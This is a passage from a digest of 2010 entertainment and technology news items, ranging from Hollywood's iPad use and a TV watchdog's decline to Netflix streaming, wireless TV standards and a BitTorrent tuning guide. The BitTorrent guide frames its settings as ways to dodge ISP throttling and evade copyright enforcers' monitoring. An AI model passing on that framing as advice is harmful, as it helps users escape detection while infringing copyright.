“It’s perfect for the long hours here,” Ms. Benz said in her trailer on the Walt Disney Studios lot this summer.

All this acclaim amounts to free advertising for Apple, which has rarely if ever given away its products to A-list customers. And the use of iPads inevitably ends up inspiring story lines that millions of people see. On the NBC show “The Office” this month, when one character asks what time it is, another character pulls out his iPad, like an oversize pocket watch.

The iPad’s most prominent appearance in prime time came in April, just days after it was put on sale, on the ABC sitcom “Modern Family,” when one of the characters desperately wanted an iPad for his birthday. Eyebrows were raised because Apple’s chief executive, Steven P. Jobs, is on the board of ABC’s parent, Disney. An Apple spokeswoman said the company does not pay for product placement, and an executive producer of “Modern Family,” Steve Levitan, said the iPad story originated with the show’s writers.

Mr. Levitan happens to be an avid iPad user, sometimes posting to Twitter from the tablet.

According to the Nielsen Company, Apple products have popped up about 2,438 times on television programs through September of this year. Some of those are news programs: iPads are visible on the set of the “Fast Money” talk show on CNBC, and Glenn Beck sometimes brings his to “Fox & Friends,” the Fox News morning show.

Hollywood’s converts to the iPad say it can drastically reduce the amount of paper that is wasted on script rewrites.

The actress Dana Delany, who will star in “Body of Proof,” a coming ABC drama, said she now has revisions sent to her digitally. “I think it’s the greatest invention in years,” Ms. Delany said. (The iPad will be a fixture in the medical examiner room on “Body of Proof,” which will start in early 2011.)

Mr. Orci’s iPad has served as the daily “call sheet” with the day’s instructions; acted as a map in an unfamiliar location; and allowed him to keep tabs on “Fringe” and “Hawaii Five-0,” two shows he helps produce. “Oh, and it woke me up in the morning with its alarm,” he said.

His one complaint is that the screen is hard to see in the sun.

There are some iPhone and iPad apps made especially for the entertainment community, like Rehearsal, which helps actors learn their lines. John Carroll Lynch, who appeared in the A&E series “The Glades” last summer and will appear in “Body of Proof” next year, swears by Rehearsal, which was created by the actor David H. Lawrence XVII.

The app imports the script for a television episode. “Then I run the scenes with just the others’ dialogue, and I speak when I’m supposed to be speaking,” he said.

In his downtime in his trailer, Mr. Lynch also plays the Madden 2011 app and watches shows he downloads from iTunes. He said he was surprised by how much he had come to use the tablet.

“It’s like we’re getting to the tricorder,” he said, referring to the scanning and recording gizmo from the original “Star Trek.”

TV Watchdog Group Is on the Defensive
Brooks Barnes

These are difficult days for the decency police.

The Parents Television Council spent most of the last decade as a conservative superstar in the culture wars. By pressuring the Federal Communications Commission to crack down on racy programming, the council was responsible for record-setting fines against media giants like CBS and the News Corporation.

But the organization now finds itself damaged, defanged by court challenges to the F.C.C.’s hard-line position, by its own dwindling finances and by internal troubles that resulted in its accusing a former senior employee of extortion. Meanwhile, the entertainment industry — once so afraid of the council’s wrath that Fox blurred the naked behind of an animated character — is pushing the boundaries of taste with renewed intensity.

Forget cartoon nudity. One of CBS’s new fall sitcoms is called “$#*! My Dad Says.” A catchy song with a highly vulgar title and chorus by the Warner Music Group singer Cee Lo Green has burned up the Web. Miley Cyrus, the 17-year-old Disney star, writhes on a bed in black underwear in her new music video.

The council has tried to focus public indignation on such programming, but the efforts have mostly failed to gain serious traction.

A statement it issued on Oct. 8 regarding Ms. Cyrus’s video, calling it “unfortunate that she would participate in such a sexualized video like this one,” was mild by council standards (and did not note that her father, Billy Ray Cyrus, is on the council’s advisory board).

The council is more exercised by “$#*! My Dad Says,” declaring on Sept. 17 that it would “not rest” until the network changed the title or the show was canceled. It may be a while. Pressure on advertisers has long been one of the sharpest arrows in the council’s quiver, but the sitcom, starring William Shatner, has so far carried a full roster of ads for each episode, according to CBS. One advertiser is Burger King.

New fodder is not in short supply. On Wednesday, the council was infuriated by GQ magazine, which published sexualized photos of “Glee” cast members in its November issue. The actresses, unlike Ms. Cyrus, are adults, but noting that “Glee” is a show about high school, the council issued a statement saying the display “borders on pedophilia.” To what end, though?

“Advertisers still fear the Parents Television Council, but not as much as they used to,” said John Rash, who teaches mass media and politics at the University of Minnesota and is a former executive at Campbell Mithun, a media-buying agency in Minneapolis. “It’s hard for the council to stir up indignation about cultural issues at a time of economic woe.”

Timothy F. Winter, the council’s president, said his organization, albeit weakened because of the recession, was as relevant as ever. This month, for instance, the council announced that it had persuaded pharmaceutical companies to participate in an initiative to alert parents about which broadcast television shows would contain ads for Viagra and other erectile dysfunction drugs. The council also see progress in forcing the greater regulation of violent video games.

“The downturn had a huge impact, but I feel we’ve turned a corner,” Mr. Winter said. “We’re not out of the woods, but we are told all the time that we are the beacon of light out there. Families rely greatly on our work.”

Mr. Winter said that he was confident that the campaign against CBS would bear fruit. “At the end of the day, we’re hopeful that advertisers will realize they shouldn’t be associated with excrement,” he said.

The troubles of the Parents Television Council, founded in 1995 by the conservative activist L. Brent Bozell III, appear to have started about two years ago. As the organization successfully busied itself with cleaning up America’s airwaves, its internal operations grew messy, an examination of internal documents and Internal Revenue Service forms shows.

Escalating costs collided with declining donations, resulting in a 2008 loss of almost $1 million. In 2009, as the recession battered fund-raising efforts anew, council revenue totaled $2.9 million, a 26 percent drop from the previous year. To cut costs, the organization has reduced its staff by 38 percent over the last two years.

The council’s elaborate reports — given provocative titles like “MTV Smut Peddlers” — have grown infrequent, severely hampering the organization’s lobbying and fund-raising efforts. In 2008, the council published four major reports; it published one in 2009 and has published none so far this year. (Mr. Winter said he planned to publish three reports in the next two months, including one centered on online video.)

During this period, the council encountered difficulties with its direct-mail fund-raising system. Like many nonprofit groups, the council raises money by mail: sign and return this petition — preferably with a donation — and we will send it to the F.C.C. But internal documents show that, at least for a period of some months, the council was opening tens of thousands of envelopes, looking for money, and skipping the rest of the steps.

In a March 2009 e-mail to Mr. Winter, Patrick W. Salazar, who was the council’s vice president for development but is now one of its critics and has been accused by the group of trying to extort money from it, wrote, “Almost 195,000 pieces of donor/member mail was never sent to the intended recipient.” He added, “Most of these were time-sensitive docs whose value is now shot.” That September, Mr. Salazar sent another concerned note to Mr. Winter about the fulfillment of direct-mail petitions.

“Dude, I told you I was working on fulfillment,” Mr. Winter responded. “It is under control.”

Mr. Winter said that he had done his best to sort through the backlog, but he conceded that ultimately, the council decided that a stack of petitions was too old to be of any value. The council says it is now caught up.

Daniel Borochoff, president of the American Institute of Philanthropy, a charity watchdog that gives the council a “C-plus” rating for financial efficiency based on its I.R.S. filings, said unfulfilled direct mail should ring “serious alarms” with potential donors. “It certainly tarnishes the credibility of this organization,” Mr. Borochoff said.

Mr. Salazar was also troubled by membership claims. For instance, council leaders put membership at “more than 1.3 million.” But that number counts people who have signed a petition or donated since the group’s founding, according to the council. In reality, 12,000 people at most respond to annual fund-raising appeals, Mr. Salazar said.

Mr. Winter says there is nothing misleading about the council’s membership claims, asserting that many nonprofit groups count participation in a similar fashion. As for the meager response to fund-raising appeals, Mr. Winter said that is partly a reflection of the number of solicitations sent out. “We can’t afford to communicate with everybody on our total membership list every time,” he said.

In November, Mr. Salazar left the council. He says he quit. The group says he was fired but will not cite a reason. Mr. Salazar then started an effort to extract thousands of dollars in severance by threatening to alert the news media, including The New York Times, about the internal dysfunction he said he witnessed. In addition to the direct-mail predicament and the membership count, Mr. Salazar claimed a laundry list of other wrongdoings.

In a statement, the council said that Mr. Salazar had “demanded that the P.T.C. pay him a substantial sum of cash or he would contact P.T.C. members and the media with certain allegations.” It continued: “His allegations are littered with patently false statements and misrepresentations of the truth. The P.T.C. has refused to negotiate a financial payment (or any other terms).”

The council asked the Los Angeles Police Department to investigate Mr. Salazar for extortion. A police spokesman said an investigation was completed and presented to the city attorney, who rejected it on the grounds that Mr. Salazar’s actions did not constitute a crime.

Mr. Salazar, who is now a fund-raiser for Pierce College in Woodland Hills, Calif., said in an interview that he wanted the council to pay him to go away but denied that his requests amounted to extortion.

As the council was dealing with Mr. Salazar, it ran into another buzz saw. In July, a federal appeals court struck down one of the council’s most promoted achievements, an F.C.C. policy barring the use of “fleeting expletives” on television.

The decision stemmed from a challenge by Fox, CBS and other broadcasters to the F.C.C.’s decision in 2004 to begin enforcing a stricter standard of what kind of language is allowed on free, over-the-air television.

The court unanimously ruled that the policy created a chilling effect because it left broadcasters without a guide to what the commission would find offensive. The F.C.C. has since appealed the ruling, arguing that the court overstepped its bounds. That petition is still pending.

Mr. Winter called the decision “a slap in the face” for families. “We were frankly expecting it,” he said, adding that he was confident the appeal would succeed.

The stated mission of the Parents Television Council is “to restore responsibility and decency to the entertainment industry.” Although officially nonpartisan, it shares office space with another nonprofit group founded by Mr. Bozell, the Media Research Center, which combats what it sees as liberal bias in the news media. Mr. Bozell is paid by both organizations, an arrangement that has been criticized by some watchdogs, including Mr. Borochoff of the American Institute of Philanthropy.

To further its mission, the council uses a combination of technology and human analysts to monitor prime-time programming, particularly on broadcast networks subject to F.C.C. scrutiny. The data is used for a family viewing guide on the council’s Web site; shows are labeled red, yellow or green based on language, violence, depictions of sex and “adult themes.”

Taking the decency battle to advertisers has become a bigger part of the council’s focus since Mr. Winter took over as president in 2007. Each year, the council ranks the 10 best and 10 worst advertisers based on how frequently they sponsor “family-friendly TV programs” or “objectionable content including foul language, violence and sexual themes and images.”

In 2009, General Mills ranked as the best, and the fast-food operator Yum Brands, which owns Taco Bell and KFC, as the worst.

At the moment, the council is focused on advertisers who support “$#*! My Dad Says.” After first singling out national sponsors, the council has shifted its attack to the local level, asking its members to record the show and take note of commercials for local businesses. Members are then supposed to e-mail the lists to the council.

“Your help will assure that CBS gets the message,” read the sign-off to the council’s call to action. “We don’t want any of your $#*! in front of our families!”

New Zealand Reaches Deal on ‘Hobbit’
Jonathan Hutchison

Warner Brothers agreed to keep Peter Jackson’s production of “The Hobbit” in New Zealand after the government promised to change local labor laws and offered extra financial incentives, Prime Minister John Key said Wednesday.

The deal came after two days of talks between Mr. Key and other government officials and executives from Warner and its New Line Cinema unit.

Filming of the two “Hobbit” movies, which is expected to start in February, had been threatened by a dispute over whether a New Zealand branch of an Australian union could engage in collective bargaining on the Hollywood films, which they have not been able to do in the past.

A New Zealand actors union, backed by a larger union, the Media, Entertainment & Arts Alliance of Australia, had demanded collective bargaining for work on the films, but both Warner and government officials contended that collective bargaining with actors was barred by New Zealand law.

The unions withdrew their demand and lifted their call that international unions boycott the films, but Warner executives remained concerned about the possibility of labor disruptions.

As part of the deal to keep production of the “The Hobbit” in New Zealand, the government will introduce new legislation on Thursday to clarify the difference between an employee and a contractor, Mr. Key said during a news conference in Wellington, adding that the change would affect only the film industry.

In addition, Mr. Key said the country would offset $10 million of Warner’s marketing costs as the government agreed to a joint venture with the studio to promote New Zealand “on the world stage.”

He also announced an additional tax rebate for the films, saying Warner Brothers would be eligible for as much as $7.5 million extra per picture, depending on the success of the films. New Zealand already offers a 15 percent rebate on money spent on the production of major movies..

Mr. Jackson’s office in New Zealand declined to immediately comment.

The “Hobbit” films, which are being financed in a partnership with Metro-Goldwyn-Mayer, have a production budget of about $500 million, and many in New Zealand believe they are crucial to the future of that country’s film industry.

“I’m delighted we have achieved this result. Making the two movies here will not only safeguard work for thousands of New Zealanders, but will also allow us to follow the success of the Lord of the Rings trilogy in once again promoting New Zealand on the world stage,” Mr. Key said.

“The industrial issues that have arisen in the past several weeks have highlighted a significant set of concerns for the way in which the international film industry operates here in New Zealand. We will be moving to ensure that New Zealand law in this area is settled to give film producers like Warner Brothers the confidence they need to produce their movies in New Zealand.”

Michael Cieply contributed reporting.

Netflix Clangs Death Knell for the Lowly DVD
Robert Cyran

Netflix has rung the death knell for the lowly DVD. Disks haven’t disappeared yet. But the U.S. video rental service says that most of its customers will watch more streamed content than they will from mailed disks in the fourth quarter. Though the DVD is dying swiftly, Netflix has survived this tricky switch from analog to digital and is thriving. Now it needs to see off a whole new slew of well-financed rivals.

Netflix will no longer report the percentage of customers who watch content online. Two-thirds of Netflix customers streamed something in the quarter, up from 41 percent a year earlier. This growth reflects the increased selection of available content; the introduction of a monthly plan that prices unlimited streaming cheaper than basic cable; and the fact that more people have hooked their TVs up to the Internet.

Netflix’s successful transition from mailing DVDs to streaming content is impressive. Its once-robust rival Blockbuster failed to do so—and went bust. Both businesses were built around distributing disks or videos. But Netflix’s knack for technology—evident in its superb movie recommendation algorithm and the way users smoothly stream on devices ranging from PCs to the Wii—allowed it to build barriers around its business.

This is evident in the $8 billion company’s latest quarterly figures. While subscriber numbers grew more than 50 percent over the past year, fewer of them left the service every month. Netflix also spent less than it did a year ago on finding new customers.

But the Internet switch has brought a whole slew of new rivals like Hulu and cash-rich tech behemoths Apple, Amazon and Google’s YouTube into the business. That raises the risk of sharp competition resulting in a price war at the same time Hollywood studios, cable channels and TV networks demand more for allowing their content to be streamed.

Netflix can rest a bit easier knowing that it has avoided the DVD’s fate. But at 44 times estimated 2011 earnings, investors are expecting the firm to avoid newer dangers.

Wired Explains: Wireless Tech to Connect Your TV and PC
Priya Ganapati

Netflix and Hulu make great alternatives to cable TV. The downside: You’ve got to tether a computer to your TV with some kind of cable.

Fortunately, if you’re getting tired of the cord snaking from your laptop to your entertainment center, there’s an alphabet soup of technologies angling to help you out.

Not so fortunately, these technologies are varied and largely incompatible.

Consumers today can choose from WHDI, wireless HD, WiDi, wireless USB and Wi-Fi Direct. Confused? Check out our guide to these emerging wireless streaming-media technologies.


Wireless Home Digital Interface, or WHDI, was finalized in 2009 to give consumers a way to link the PC to the TV. Think of it as the wireless equivalent of HDMI. The technology has a latency of less than 1 millisecond, which means it’s good enough not just for watching movies but should also work well to stream games from your browser to the TV.

WHDI can stream 1080p video at up to 3 Gbps (gigabits per second). All you need is a wireless HDI dongle that can plug into your laptop and a little receiver that goes behind the TV. That set will cost about $150 and will be available early next year.

Meanwhile, TV makers such as Sharp and LG are rolling out TVs with built-in support for WHDI standard.

Slowly, the WHDI consortium hopes to convince PC makers integrate WHDI chips into laptops, similar to the way Wi-Fi chips are built in today.


While other wireless technologies focus on streaming content from the PC to the TV, WirelessHD targets the most common electronic eyesore in homes: the black HDMI cables that snake out from behind the TV towards the set-top box, PC or the DVD player.

If built into TV sets, WirelessHD can offer fast data transfers of up to 10 GBps to 28 Gbps. That makes it the fastest of the lot for point-to-point data transfer.

So far, TV makers such as Panasonic, LG and Vizio have said they will offer wireless-HD–enabled sets by the end of the year.

Wireless USB

When the familiar USB port decides to go wireless, it means steaming-media companies can piggyback on to a powerful, widely understood technology.

Wireless USB is based on the Ultra-WideBand (UWB) radio platform. It can send data at speeds of 480 Mbps at distances of up to 10 feet and 110 Mpbs at up to 32 feet. Companies such as Logitech already offer UWB-based kits that can be used to connect your PC to the TV.

A startup called Veebeam launched a box that uses wireless USB to stream internet video from your laptop to the TV.

Wireless USB is more powerful for point-to-point connectivity than traditional Wi-Fi, because it offers more bandwidth and less interference, says Veebeam. It estimates 420 Mbps bandwidth for its wireless USB implementation.


Picture yourself downloading a 25-GB Blu-ray disc in less than a minute. That’s what WiGig can do for you, says the Wireless Gigabit Alliance. The Alliance is a consortium of electronics companies that has established a specification for a wireless technology. WiGig could offer users data-transfer speeds ranging from 1 Gbps to 6 Gbps — or at least 10 times faster than today’s Wi-Fi.

The alliance had hoped to make WiGig commonplace by the end of the year, but it has been slow going for the standard, which has not been implemented in any consumer products.


The latest version of the ubiquitous wireless networking technology is 802.11n, also known as Wireless N. With speeds up to 600 Mbps, it’s fast enough to sling plenty of data around your house. Plus it can support up to four simultaneous streams of high-definition video, voice and data, and it’s already built into many devices.

The standard has a powerful backer in Qualcomm, which has been working to create Wireless-N chips that can be embedded into devices like set-top boxes and TV. But while many computer makers have jumped on the technology, consumer electronics companies have been cool to the idea.

Part of the problem is that Wireless N requires you to have a router, which introduces complications many consumer-oriented companies would like to avoid. One possible alternative: Wi-Fi Direct, which supports peer-to-peer connections and can work on 802.11 a/b/g/n. Wi-Fi Direct, formerly known as Wi-Fi Peer-to Peer, lets devices connect to one another easily for permanent or temporary connections, without requiring them to join the network of a nearby wireless router.

In addition to wirelessly streaming HD content, Wi-Fi Direct will make it easy to send images from your camera on a friend’s HDTV, display PowerPoint slides from your smartphone on a client’s video projector, or send web pages from your tablet to a printer wirelessly.

The Wi-Fi Alliance claims that Wi-Direct will have a range of about 600 feet and about 250 Mbps to 300 Mbps of real throughput. The alliance has announced it will begin certifying products that comply with the standard. That means manufacturers can begin building compatible products, get them tested by the alliance and start marketing the products to consumers, perhaps as early as the next few months.

There are some limitations: Not all Wi-Fi Direct devices will be able to connect with one another. Devices will only be able to connect with devices that have compatible Wi-Fi Direct support. And of course, device makers will have to explain all this to consumers. Good luck with that marketing budget.


Meanwhile, Intel has taken the 802.11 standard to create its own service called WiDi that will be preloaded into many laptops that have Intel chips. Some 44 models of notebooks sold at Best Buy have the WiDi technology already. But consumers will need to buy an additional $100 adapter from Netgear to complete the connection to their TVs.

The wireless streaming is currently to limited to 720p resolution, and it can’t handle Blu-ray content, although Intel plans to support higher-resolution video in the future.

Intel’s WiDi technology, maxes out at about 9 Mbps and suffers from latency issues. So while it works fine for video, it could be difficult to play a game on a TV that’s wirelessly being streamed from a laptop.

For a handy reference guide, check out the table below to see the different technologies and how they compare. The speed and range are listed per each standard’s theoretical specifications. In the real world, these speeds are likely to be much lower.

WHDI Kits Explored: Asus WiCast, Brite-View HDelight
Dave Altavilla

Home Theater PC buffs rejoice, wireless HDMI technologies have finally come of age. Though there are two camps firmly entrenched in the market (Intel's WiDi and WHDI), the bottom line is lag-free full HD 1080p HDMI wireless video/audio transmission is now a reality. No longer does that HTPC need to be shoehorned into the confines of your entertainment center. And that desktop replacement notebook you have perched on the coffee table just got a major display upgrade, seamlessly connected to your HDTV; look Ma, no wires. Stay with us as we take you through a tour of two WHDI standard-based wireless HDMI transmitter kits--the Asus WiCast and the briteView HDelight. Big screen gaming nirvana and multitude of media center goodness takes center stage at HotHardware.

Both of these WHDI-based kits utilize the same family of Amimon WHDI transmitter and receiver chipsets. The technology is capable of full 1080p HD video and Dolby Digital surround sound audio transmissions over distances of up to 30 feet with less than a millisecond of latency. This new technology is, in a word, "amazing" actually.

FarmVille Worth More Than EA

Zynga, the creators of the popular hit FaceBook game FarmVille should be happy today as the company’s worth has passed that of EA (Electronic Arts). BusinessWeek reports that the net worth of the privately hed company Zynga is worth 5.51 Billion versus the video game giant EA’s worth of 5.22 Billion.

Zynga was founded in July 2007 by Mark Pincus, Michael Luxton, Eric Schiermeyer, Justin Waldron, Andrew Trader, and Steve Schoettle with a starting venture capital of $29 million. Zynga also employs around 1300 employess to date. In Zynga’s network of games there is a total of approximately 220 million players which contribute to the companies continued growth.

Zynga creates their income from in-game payments for items across most of their games and partnerships with businesses. We will have to see how much further the company can grow in the next couple of years, so far it has been astonishing.

Jacksonville Mom Shakes Baby for Interrupting FarmVille, Pleads Guilty to Murder
David Hunt

A Jacksonville mother charged with shaking her baby to death has pleaded guilty to second-degree murder.

Alexandra V. Tobias, 22, was arrested after the January death of 3-month-old Dylan Lee Edmondson. She told investigators she became angry because the baby was crying while she was playing a computer game called FarmVille on the Facebook social-networking website.

Tobias entered her plea Wednesday before Circuit Judge Adrian G. Soud. A second-degree murder charge is punishable by up to life in prison.

Prosecutor Richard Mantei said Tobias' sentence could be less because of state guidelines that call for 25 to 50 years. Soud offered no promises on what he'll order during a sentencing hearing scheduled for December.

Outside the courtroom, Mantei said Tobias' plea will help avoid the family reliving the tragedy during a jury trial.

Tobias told investigators that she shook the baby, smoked a cigarette to compose herself and then shook him again. She said the baby may have hit his head during the shaking.

How to Boost Your BitTorrent Speed and Privacy
Whitson Gordon

BitTorrent's been around for a whopping ten years, but it continues to evolve and remains one of the best file-sharing tools available. If you really want to make your downloads soar—and keep Big Brother out of your business—this guide's for you.

We showed you how to get started sharing and downloading files with BitTorrent a few years ago, and most of that still applies, but if you're looking to up your BitTorrent skills, things have changed a lot since then.

In fact, some of you may find BitTorrent a bit old school for your tastes. Sure, the ISPs are cracking down and throttling peer-to-peer users, and you have other great file-sharing alternatives like Usenet, but that doesn't mean BitTorrent doesn't still have a place in your routine. It's pretty easy to ward of prying eyes with today's BitTorrent clients, and while Usenet is certainly great, BitTorrent is still more widespread. As such, it tends to have a better selection on certain things, and is at the very least a good fallback method for when you don't find what you're looking for elsewhere. After all, there's no reason you have to be loyal to only one file-sharing protocol.

This intermediate guide to BitTorrent is designed to help you do three things: jack up your speeds (without consuming your bandwidth) and keep unwanted snoopers from seeing what you're doing. We've divided them up into three sections:

• Increase Your Speed and Privacy with a Few Easy Settings
• Keep That Newfound Speed from Hijacking All Your Bandwidth
• Really Hide Your Traffic with External Solutions

For the purposes of this guide, we're focusing on two BitTorrent clients: uTorrent for Windows and Transmission for Mac OS X. That doesn't mean you can't use other clients like Vuze (or KTorrent and Transmission for Linux, if you are of the Linux persuasion), but there are just too many clients out there for us to give specific instructions for each. uTorrent and Transmission are some of the most popular clients out there, and they're our favorite here at Lifehacker, so where appropriate, we'll give you specific instructions for each client. Note that uTorrent for Mac is not nearly as mature as uTorrent for Windows, and may not have some of these features—so, in this particular case, when we reference uTorrent, we mean uTorrent for Windows.

Keep Your BitTorrent Speed and Privacy at the Max with a Few Simple Settings

BitTorrent clients have come a long way in the past few years, and where it used to be much more difficult to hide your BitTorrent activity, it's now a matter of checking the right boxes. Here are a few settings every BitTorrent user should have enabled.

Randomize and Forward Your Router Ports

If you're connected to your internet through a router, it's likely that many of your ports are closed, meaning your speeds will be much slower than you'd like. You'll need to let your router know which ones you want open for BitTorrent traffic, which is known as port forwarding. Furthermore, many ISPs or organizations (say, if your neighborhood or leasing company provides your internet) will block popular BitTorrent ports, so you'll want to switch up the port you use every once in a while to keep them guessing.

Both of these are extremely simple in uTorrent and Transmission. in uTorrent, just to go Options > Preferences and hit the connection tab. Make sure all four boxes under the "Listening Port" section are checked—Enable UPnP Port Mapping, Enable NAT-PMP Port Mapping, Randomize Port Each Start, and Add Windows Firewall Exception.

In Transmission, open up the app's preferences and head to the Network pane. Check both the Randomize Port on Launch and Automatically Map Port boxes. If you see that the light next to the port's number goes from red to green, then you've successfully opened your current port to BitTorrent traffic, and you should notice a good increase in speed.

Note that for best results, you'll want to make sure your router is UPnP capable and has UPnP enabled. Most routers are UPnP ready, but if you find that you're having trouble, you may need to look at your router's manual and settings page to enable its use.

Encrypt Your BitTorrent Traffic

Nowadays, many internet service providers will throttle your bandwidth, prevent you from seeding, or do any other number of annoying things to try and stop you from torrenting. Apart from randomizing your ports, another thing you can do to try and keep them out is encrypt your traffic. It won't necessarily work on every client, but I've found that it nearly doubled my download speeds, so it's certainly worth a shot.

In uTorrent, go back to the preferences and hit up the BitTorrent section in the left sidebar. Under Protocol Encryption, open the dropdown menu labeled Outgoing. You have three options: Disabled, Enabled, and Forced. Try Enabled for awhile, but if you don't see a good speed increase, using the Forced setting might give you better results. Also note the Allow Incoming Legacy Connections checkbox—If you have a specific torrent that doesn't have a lot of people seeding, you might want to check this box temporarily, though I try to keep it unchecked whenever I can. This ensures that any peers you connect to will use encryption and that your ISP will be less likely to throttle you.

In Transmission, head over to the Peers pane of the app's preferences and check the Encryption section. Definitely check the "Prefer Encrypted Peers" box, and I'd highly recommend checking the "Ignore Unencrypted Peers" box, though again, if you are noticing that there aren't a lot of peers connecting for a specific torrent, try unchecking it to see if that helps your speeds.

Block Peers that Might be Snooping

Even worse than throttling ISPs is the threat of the snooping RIAA, MPAA, or other organization looking to take you down. Often, they'll post fake torrents of copyrighted material (or just join in on real ones) and track those downloading, leading them right to an unprepared you. While there is no foolproof way to avoid them, a really great simple way is to use a peerblocker. Transmission has this feature built-in, while Windows users will need to use a separate program.

If you're a Mac user, open up Transmission's preferences and head back to the Peers pane. This time, check the box that reads "Prevent Known Bad Peers from Connecting" down under the Blocklist section. Hit the update button to make sure the list of bad peers is recent, and check the Automatically Update Weekly box to keep it up to date.

Windows users will need to download previously mentioned PeerBlock (an updated version of the seemingly defult, previously mentioned Peer Guardian 2) to block the big boys from snooping. The first time you run it, it'll take you through a setup wizard, in which you can decide who you want to blacklist. Check the box for anti-P2P organizations (as well as anything else you may want, though the P2P box is the only important one for BitTorrent) and schedule it to update as often as you want. You might as well update it every day; there's no reason to be stingy with your privacy here. Then, just make sure it runs when you use your BitTorrent client—it'll keep you save from those bad peers.

Automate Your Client and Free Up Bandwidth

These are some tricks that have been around for awhile, and they won't exactly keep Big Brother off your back, but they are useful for keeping BitTorrent from overtaking your internet connection, especially if you've experienced some heavy speed increases from the above tips. Here are a few ways to automatically manage BitTorrent's use of your bandwidth.

Set Global Bandwidth Limits

BitTorrent downloads and uploads can hog a lot of your internet connection's bandwidth, especially if you're sharing popular content. The simplest way to keep BitTorrent from hogging your connection is to set global upload and download limits. In uTorrent, you can find them in the Connection section of the Preferences. The settings are fairly self-explanatory—just set your max upload and download rates (in kB/s), or choose 0 to keep the rates unlimited.

In Transmission, it's under the Bandwidth pane of the app's preferences—just check the "Download Rate" and "Upload Rate" boxes and set your speeds however you want. You can also set a "Speed Limit" mode, if you want to switch between to different bandwidth limits—say, give it more bandwidth when your just checking email and the like, and cut the limits down when you need that bandwidth for streaming video or online gaming.

Throttle Your BitTorrent Downloads on a Schedule

You could just quit your BitTorrent client (or manually turn on Speed Limit mode) whenever you want to conserve your bandwidth, but if you're like me, you'll forget to start it back up—meaning you'll end up delaying your downloads (most likely until you want whatever was supposed to be downloading, at which point you will slap your forehead).

To remedy this situation, uTorrent and Transmission both come with simple Scheduler features that you can access through the Preferences. In uTorrent, go to Options > Preferences, then find Scheduler in the sidebar. Tick the box next to "Enable Scheduler" and you'll see a grid of green boxes light up. The grid runs Monday through Sunday, midnight to midnight (or 0:00 to 23:59), one box per hour. Here's how it works:

• Dark green boxes indicate that uTorrent will download and upload at full speed (or whatever you've set as its full speed).
• Light green boxes indicate limited download and upload rates.
• White boxes indicate that uTorrent will not download or upload any content.
• Pink boxes indicate that uTorrent will only seed, not download. I'm not exactly sure when one would be inclined to use this, but it's there if you want it.

I've always got a little bandwidth to spare on my connection, but I certainly don't want uTorrent hogging my bandwidth while I'm working, so I set the Scheduler to limit speeds from 8am to midnight every day. During the wee hours of the morning, when I'm very unlikely to be at my computer, I open the flood gates and give uTorrent unlimited upload/download speeds. Also, since I generally stay away from my computer on Saturday, I keep uTorrent at full throttle. See the screenshot above to see what this sort of schedule would look like. Like I said, my connection can handle a little bit of bandwidth bleeding all of the time, so when I'm running at limited rates, I set my upload speed to 5 kB/s and my download speed to 15. Handy, huh?

In Transmission, it's a bit more basic. Just open up Transmission's Preferences and to to the Bandwidth tab. You only have two modes instead of three—your global bandwidth limits and Speed Limit mode. You can schedule the speed limit mode to turn on and off at a specific time either every day, on weekdays, weekends, or on a specific day of the week. It's not quite as flexible as uTorrent's scheduler, but works well enough—I'll generally just limit its speed during the day, and let it tear up my connection when I'm sleeping.

Ensure a good share ratio without wasting extra bandwidth

As Adam mentioned in our beginner's guide, an important part of BitTorrent is sharing, and a good member of the BitTorrent community gives as much as he/she takes. In fact, many sites, especially private trackers, keep a close eye on your share ratio and may even ban you if you don't keep your ratio above a certain point (i.e., if you are a "leecher"). This isn't as widespread as it used to be, but it does still happen—and besides, sharing is just a nice thing to do. I'm in total agreement of the whole share-and-share-alike attitude, but once I've shared an equal part of what I've downloaded, I don't want to waste too much extra bandwidth on that torrent.

Rather than constantly checking your torrent ratios so you can remove them as soon as they cross the 1.0 barrier, go to the Queuing section of uTorrent and find the "Seed While" section. There you can set a goal ratio for a file you're sharing, then set how much bandwidth uTorrent will allocate to the torrent once that goal is reached (in the screenshot, for example, uTorrent will stop sharing the file after its share ratio reaches 150%). If you prefer, you can just limit the upload rate when uTorrent reaches its goal by checking the corresponding box at the bottom of the window.

In Transmission, head to the Transfers pane of the preferences and click on the Management tab. Check the box that says Stop Seeding at Ratio and set the ratio to whatever you want, like 1.50 (meaning when your ratio reaches 150%).

External Solutions for Hiding Your Traffic

We won't go into too much detail here (as these solutions could be posts of their own), but we thought some of the more extreme measures deserved mentions in this guide. Here are a few other ways to really keep others out of your business.

Use a VPN

While there are a number of great solutions to hide your identity while downloading, using a VPN is usually a very cheap and popular way to do so. You can use any number of VPN services (like previously mentioned ItsHidden), which will route your traffic through another server, keeping your IP address away from prying eyes.

Set up a Proxy

One of the other popular methods of obscuring yourself is using a proxy, which works similarly to a VPN. You could roll your own SSH proxy or use something a bit easier like BTGuard, which we've covered how to do before. You very well may see a speed drop when using this method, though, so if speed is more important to you than privacy, this may not be the best route to go.

As always, this guide is not all-encompassing. There are any number of tweaks, methods, and preferences that you could use to quicken, hide, or all-around improve your BitTorrent downloads. If you have any favorite settings we didn't cover, share them with us in the comments.

Sony Shares Rise on Speculation of Apple Interest

Shares of Sony Corp rose nearly 3 percent at one stage on Tuesday as traders cited media reports speculating that the Japanese electronics maker could be a potential acquisition target of Apple Inc.

Helping to spark the speculation was a Saturday report in Barron's that said cash-rich Apple could be contemplating a big acquisition and noted speculation about Adobe, Sony and Disney as potential targets.

Sony spokeswoman Sue Tanaka said: "We cannot comment on rumors or speculation."

During an October 18 conference call with investors and reporters following Apple's latest earnings announcement, CEO Steve Jobs was asked what the company would do with its $51 billion in cash.

"We would like to continue to keep our powder dry, because we do feel that there are one or more strategic opportunities in the future," Jobs said.

Some analysts were skeptical about the feasibility of a buy-out.

"If Apple tries to buy the whole of Sony, it will be a hostile takeover, and that will probably not succeed in Japan," said one analyst in Tokyo, who declined to be named.

"I don't think Sony would want to join hands with Apple since it is working with Google to compete against Apple," he added.

Sony shares closed up 0.7 percent at 2,742 yen after climbing as high as 2,804 yen. Trading volume was 17.61 million shares, the highest since July 30, the day after the company surprised the market with a quarterly profit and raised its full-year profit outlook.

The benchmark Nikkei average fell 0.3 percent.

(Reporting by Chikafumi Hodo, Sachi Izumi and Isabel Reynolds; Editing by Chris Gallagher)

Microsoft vs. Apple: Who's Winning? The Numbers Don't Lie
Ed Bott

